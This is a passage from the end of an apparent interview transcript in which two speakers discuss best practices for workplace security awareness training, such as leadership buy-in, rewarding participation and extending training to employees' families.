Yeah, I'm building a pen testing agent right now, and it has every bit of Kali in a database, with all the man files and everything. And it's interesting, like you said, the way it uses tools, because you're 100% right: unless it's almost exactly what a popular tutorial says, it's going to use a tool in an obscure way. Well, we are running low on time here, and before we wrap up, I want to ask if you have any tips when it comes to building out security awareness programs, just the top best practices that you would recommend.

Kevin Walsh:

Well, number one, of course, is getting your leadership on board with it, and communicating it through your HR or whatever your communications channels are inside your company. As soon as everyone knows that this is a major push by the company, they're definitely on board with it. And like we were talking about with carrot and stick, it should be pretty much all carrot: this is something we want you to pay attention to, this is something that's fun, this is something that's interactive, and it's going to benefit you. One nice thing to do, and a lot of training companies offer this, is to let employees not only use it themselves, but let their family members benefit from it too. In other words, share some of the training videos with members of their family. This really does reward the employee; they become the expert in their world, through your company, by enabling them, and it just encourages them to be better at it.

Kevin Walsh:

In some ways, it's: I work for a high-tech company, or a company that is interested in security, and now I'm going to get a brother and sister and uncle and aunt involved in this too, because I know they're having issues as well. So this is a great way to encourage people. Also, we should be covering all aspects, not just email and messaging security, but also physical security, security over the phone, and the different ways that we all know you can do social engineering, and have people simply aware of it. This is another thing they can communicate to their friends and relatives. It's a multiplying effect when you do training properly and in a way that people are enthusiastic about.

Joshua Crumbaugh:

You know, I saw a study that said that when you make training contextual to somebody's role within the organization, it makes it 15 times more effective. So when you say it's a multiplying effect, I would imagine the number is 15x, because while it's not making it contextual to their role in the organization, it's making it contextual to their life, and it's connecting the dots to the threat that exists at home. So it's not just them protecting the corporate overlords; it's them protecting themselves, and I think that really does bring it home. That's really great advice. Well, thank you for joining us today. Any final words?

Kevin Walsh:

No, just thank you very much for having me. It was great talking and really learning about you, what you do and your thoughts as well.

Joshua Crumbaugh:

Yeah, thank you so much for being here. It's been an absolute pleasure. For those of you joining us remotely, we will see you again tomorrow. Thank you.